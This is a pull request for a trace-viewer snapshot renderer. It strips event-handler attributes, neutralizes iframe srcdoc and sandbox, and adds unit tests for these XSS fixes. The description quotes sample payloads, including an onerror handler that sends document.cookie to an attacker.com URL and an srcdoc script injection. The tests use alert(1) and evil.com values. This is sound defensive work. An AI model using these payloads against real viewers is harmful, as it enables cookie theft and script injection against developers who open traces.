### PR TITLE
fix(trace-viewer): strip event handlers and neutralize IFRAME srcdoc/sandbox in snapshot renderer

### DIFF
--- a/packages/isomorphic/trace/snapshotRenderer.ts
+++ b/packages/isomorphic/trace/snapshotRenderer.ts
@@ -122,9 +122,21 @@ export class SnapshotRenderer {
         const hasUnsafeHttpEquiv = isMeta && attrs.some(a => a[0].toLowerCase() === 'http-equiv' && !kAllowedMetaHttpEquivs.has(a[1].trim().toLowerCase()));
         for (const [attr, value] of attrs) {
           let attrName = attr;
+          // Strip event handler attributes. The capture side already empties these,
+          // but a crafted trace file could include live handlers (e.g. onerror, onclick).
+          // escapeHTMLAttribute does not help because payloads like "alert(1)" contain
+          // no characters that need escaping.
+          if (attr.toLowerCase().startsWith('on'))
+            continue;
           if (isFrame && attr.toLowerCase() === 'src') {
             // Never set relative URLs as <iframe src> - they start fetching frames immediately.
             attrName = '__playwright_src__';
+          }
+          if (isFrame && (attr.toLowerCase() === 'srcdoc' || attr.toLowerCase() === 'sandbox')) {
+            // Neutralize srcdoc (could contain arbitrary HTML/script that executes
+            // automatically) and sandbox (could widen permissions on an inner iframe).
+            // The capture side already skips these, but a crafted trace could include them.
+            attrName = '__playwright_' + attr.toLowerCase() + '__';
           }
           if (isImg && attr === kCurrentSrcAttribute) {
             // Render currentSrc for images, so that trace viewer does not accidentally

--- a/packages/isomorphic/trace/snapshotRenderer.ts
+++ b/packages/isomorphic/trace/snapshotRenderer.ts
@@ -106,16 +106,17 @@ export class SnapshotRenderer {
         // Element node.
         // Note that <noscript> will not be rendered by default in the trace viewer, because
         // JS is enabled. So rename it to <x-noscript>.
-        const nodeName = name === 'NOSCRIPT' ? 'X-NOSCRIPT' : name;
+        const upperName = name.toUpperCase();
+        const nodeName = upperName === 'NOSCRIPT' ? 'X-NOSCRIPT' : name;
         const attrs = Object.entries(nodeAttrs || {});
         result.push('<', nodeName);
         const kCurrentSrcAttribute = '__playwright_current_src__';
-        const isFrame = nodeName === 'IFRAME' || nodeName === 'FRAME';
-        const isAnchor = nodeName === 'A';
-        const isImg = nodeName === 'IMG';
-        const isMeta = nodeName === 'META';
+        const isFrame = upperName === 'IFRAME' || upperName === 'FRAME';
+        const isAnchor = upperName === 'A';
+        const isImg = upperName === 'IMG';
+        const isMeta = upperName === 'META';
         const isImgWithCurrentSrc = isImg && attrs.some(a => a[0] === kCurrentSrcAttribute);
-        const isSourceInsidePictureWithCurrentSrc = nodeName === 'SOURCE' && parentTag === 'PICTURE' && parentAttrs?.some(a => a[0] === kCurrentSrcAttribute);
+        const isSourceInsidePictureWithCurrentSrc = upperName === 'SOURCE' && parentTag === 'PICTURE' && parentAttrs?.some(a => a[0] === kCurrentSrcAttribute);
         // For META, only allow a small whitelist of http-equiv directives so a malicious snapshot
         // cannot navigate the snapshot iframe via e.g. <meta http-equiv="refresh"> or otherwise
         // affect the trace viewer.
@@ -134,8 +135,9 @@ export class SnapshotRenderer {
           }
           if (isFrame && (attr.toLowerCase() === 'srcdoc' || attr.toLowerCase() === 'sandbox')) {
             // Neutralize srcdoc (could contain arbitrary HTML/script that executes
-            // automatically) and sandbox (could widen permissions on an inner iframe).
-            // The capture side already skips these, but a crafted trace could include them.
+            // automatically) and sandbox (attacker-controlled values could alter
+            // iframe security policy). The capture side already skips these, but a
+            // crafted trace could include them.
             attrName = '__playwright_' + attr.toLowerCase() + '__';
           }
           if (isImg && attr === kCurrentSrcAttribute) {

--- a/tests/library/snapshot-renderer.spec.ts
+++ b/tests/library/snapshot-renderer.spec.ts
@@ -46,3 +46,50 @@ for (const [name, overrides] of [
     expect(html.match(/<\/script>/g)).toHaveLength(1);
   });
 }
+
+test('snapshot renderer strips event handler attributes', () => {
+  const renderer = new SnapshotRenderer(new LRUCache(1_000_000), [], [makeSnapshot({
+    html: ['HTML', {}, ['BODY', {}, ['IMG', { 'onerror': 'alert(1)', 'src': 'x' }]]],
+  })], [], 0);
+  const { html } = renderer.render();
+  expect(html).not.toContain('onerror="alert(1)"');
+  expect(html).toContain('src="x"');
+});
+
+test('snapshot renderer strips onclick attributes', () => {
+  const renderer = new SnapshotRenderer(new LRUCache(1_000_000), [], [makeSnapshot({
+    html: ['HTML', {}, ['BODY', {}, ['DIV', { 'onClick': 'alert(1)' }, 'click me']]],
+  })], [], 0);
+  const { html } = renderer.render();
+  expect(html).not.toContain('onClick');
+  expect(html).not.toContain('onclick');
+  expect(html).toContain('click me');
+});
+
+test('snapshot renderer neutralizes iframe srcdoc', () => {
+  const renderer = new SnapshotRenderer(new LRUCache(1_000_000), [], [makeSnapshot({
+    html: ['HTML', {}, ['BODY', {}, ['IFRAME', { 'srcdoc': '<script>alert(1)</script>' }]]],
+  })], [], 0);
+  const { html } = renderer.render();
+  expect(html).not.toContain(' srcdoc=');
+  expect(html).toContain('__playwright_srcdoc__');
+});
+
+test('snapshot renderer neutralizes iframe sandbox', () => {
+  const renderer = new SnapshotRenderer(new LRUCache(1_000_000), [], [makeSnapshot({
+    html: ['HTML', {}, ['BODY', {}, ['IFRAME', { 'sandbox': 'allow-scripts allow-top-navigation' }]]],
+  })], [], 0);
+  const { html } = renderer.render();
+  expect(html).not.toContain(' sandbox=');
+  expect(html).toContain('__playwright_sandbox__');
+});
+
+test('snapshot renderer handles case-insensitive iframe tag names', () => {
+  const renderer = new SnapshotRenderer(new LRUCache(1_000_000), [], [makeSnapshot({
+    html: ['HTML', {}, ['BODY', {}, ['iframe', { 'srcdoc': '<script>alert(1)</script>', 'src': 'http://evil.com' }]]],
+  })], [], 0);
+  const { html } = renderer.render();
+  expect(html).not.toContain(' srcdoc=');
+  expect(html).toContain('__playwright_srcdoc__');
+  expect(html).toContain('__playwright_src__');
+});


### PR DESCRIPTION
## Summary

- Strip `on*` event handler attributes and neutralize IFRAME `srcdoc`/`sandbox` in the snapshot renderer
- Fix case-insensitive tag name comparisons to prevent bypasses via lowercase names in crafted traces
- Follow-up to #40655 (SCRIPT + doctype sanitization) and #40115 (META http-equiv + iframe sandboxing)

## Problem

The capture side (`snapshotterInjected.ts`) empties `on*` attribute values and skips IFRAME `srcdoc`/`sandbox`, but the renderer has no corresponding checks. A crafted trace file bypasses the capture side entirely.

**Vector 1: Event handler attributes (zero interaction)**

```json
["IMG", {"onerror": "fetch('https://attacker.com/steal?c='+document.cookie)", "src": "x"}, []]
```

`escapeHTMLAttribute` does not help because payloads like `alert(1)` contain no characters that need escaping (`&`, `<`, `>`, `"`, `'`). The invalid `src="x"` triggers `onerror` automatically when the snapshot renders.

**Vector 2: IFRAME srcdoc (zero interaction)**

```json
["IFRAME", {"srcdoc": "<body onload=\"parent.window.__pwned=true\">"}, []]
```

`escapeHTMLAttribute` escapes `<` to `&lt;` and `"` to `&quot;`, but the browser decodes HTML entities in attribute values before parsing `srcdoc` content, undoing the escaping entirely.

Both vectors were confirmed to execute automatically in Chromium with no user interaction.

**Attack surface:** Trace files are shared between team members, uploaded as CI artifacts, and opened on [trace.playwright.dev](https://trace.playwright.dev). AI coding agents ([OpenClaw](https://github.com/openclaw/openclaw), Claude Code) that browse untrusted sites generate traces that developers then inspect. The OpenClaw project has had [stored XSS in its own session viewer](https://github.com/openclaw/openclaw/security/advisories/GHSA-r294-2894-92j3) from the same `innerHTML` + `onerror` pattern. A similar `innerHTML` + `onerror` vulnerability in [SiYuan Note](https://github.com/siyuan-note/siyuan/security/advisories/GHSA-4663-4mpg-879v) (CVE-2026-33066) escalated to full RCE in Electron.

## Fix

- Strip `on*` attributes entirely (`continue` in the attribute loop)
- Rename `srcdoc` and `sandbox` to `__playwright_srcdoc__`/`__playwright_sandbox__` (same pattern used for `src` since #40115)
- Normalize tag names to uppercase for `isFrame`, `isAnchor`, `isImg`, `isMeta` comparisons (the pre-existing comparisons were case-sensitive, allowing a crafted trace to bypass them with lowercase tag names)

## Changes

- `packages/isomorphic/trace/snapshotRenderer.ts`: Attribute filtering + case-insensitive tag comparisons
- `tests/library/snapshot-renderer.spec.ts`: 5 new unit tests covering `on*` stripping, `srcdoc`/`sandbox` neutralization, and case-insensitive bypass prevention

Follows the defense-in-depth pattern established in #40655, #40115, and #14325. See also #19992 (traces as untrusted data) and #40533 (trace sanitization feature request).